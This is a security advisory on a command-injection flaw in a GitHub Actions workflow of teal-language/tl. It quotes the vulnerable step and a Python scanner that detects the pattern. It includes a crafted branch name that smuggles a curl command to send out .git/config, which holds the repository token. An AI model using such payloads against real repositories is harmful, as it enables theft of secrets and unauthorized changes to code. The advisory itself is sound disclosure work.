February 3, 2021

GHSL-2021-017: Command injection in teal-language/tl workflow

Jaroslav Lobačevski

Coordinated Disclosure Timeline


The playground GitHub workflow is vulnerable to unauthorized modification of the base repository or secrets exfiltration from a Pull Request.


teal-language/tl repository

Tested Version

The latest changeset of playground.yml as of the date of this advisory.


Issue: A branch name from the pull request is used to format a shell command

    branches: [ master ]
    - name: build
      run: |
        # github.head_ref (the PR branch name) is substituted into this script as text before bash runs it
        echo "${{ github.event.pull_request.head.repo.full_name }}/${{ github.head_ref }}"
        cd ${{ github.workspace }}/teal-playground
        yarn build


This vulnerability allows arbitrary command injection into the bash script, which in turn allows unauthorized modification of the base repository and secrets exfiltration. Because the ${{ github.head_ref }} expression is expanded into the script text before bash runs it, the double quotes around the echo argument give no protection. For example, a PR from a branch named a";${IFS}curl${IFS}-d${IFS}@.git/config${IFS}${IFS}# would exfiltrate the repository token to an attacker-controlled server.
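As an added illustration (not part of this advisory or of the teal-language/tl project), the following Python script scans workflow text for ${{ }} expressions that expand GitHub-documented attacker-controllable contexts inside run: steps, and is run over the step from this advisory and over a hardened rewrite that passes the branch name through env: so bash receives it as data rather than as script text. The context list is a subset of GitHub's documented untrusted inputs, and the sample steps and the HEAD_REF variable name are assumptions.

```python
"""Flag `${{ }}` expressions that expand attacker-controlled GitHub contexts inside a step's
`run:` script: the runner substitutes them as text before the shell executes. `env:` is not flagged."""
import re
# Contexts GitHub documents as attacker-controllable (subset); '*' matches one path segment.
UNTRUSTED_CONTEXTS = (
    "github.head_ref", "github.event.pull_request.head.ref", "github.event.pull_request.title",
    "github.event.pull_request.body", "github.event.issue.title", "github.event.issue.body",
    "github.event.comment.body", "github.event.head_commit.message", "github.event.commits.*.message",
)
EXPR = re.compile(r"\$\{\{\s*([^}]*?)\s*\}\}")          # captures the expression body
RUN_KEY = re.compile(r"^(\s*)(-\s+)?run:\s*(.*)$")       # `run:` key, optionally as a list item

def is_untrusted(expr: str) -> bool:
    path = re.sub(r"\[\d+\]", ".*", expr.strip())        # commits[0].message -> commits.*.message
    return any(re.fullmatch(re.escape(p).replace(r"\*", r"[^.]+"), path) for p in UNTRUSTED_CONTEXTS)

def find_injections(workflow_text: str) -> list:
    """Return [(line_number, expression)] for untrusted expressions inside run: scripts."""
    findings, block_indent = [], None   # block_indent: indent of `run:` while inside a |/> block
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        m = RUN_KEY.match(line)
        if m:
            block_indent = None
            if m.group(3).startswith(("|", ">")):          # multi-line script follows
                block_indent = len(m.group(1)) + len(m.group(2) or "")
                continue
            findings += [(lineno, e) for e in EXPR.findall(m.group(3)) if is_untrusted(e)]
        elif block_indent is not None:
            if line.strip() and len(line) - len(line.lstrip()) <= block_indent:
                block_indent = None                        # dedent ends the block scalar
            else:
                findings += [(lineno, e) for e in EXPR.findall(line) if is_untrusted(e)]
    return findings

# Constructed samples: the advisory's step, and a rewrite that passes the branch name via env:.
VULNERABLE_STEP = """\
    - name: build
      run: |
        echo "${{ github.event.pull_request.head.repo.full_name }}/${{ github.head_ref }}"
        yarn build
"""
HARDENED_STEP = """\
    - name: build
      env:
        HEAD_REF: ${{ github.head_ref }}
      run: |
        echo "${{ github.event.pull_request.head.repo.full_name }}/$HEAD_REF"
        yarn build
"""
```

Running find_injections over VULNERABLE_STEP reports the github.head_ref expression on the echo line, while HARDENED_STEP produces no findings because the expression now sits in env: and the script only reads a shell variable.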


This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).


You can contact the GHSL team at, please include a reference to GHSL-2021-017 in any communication regarding this issue.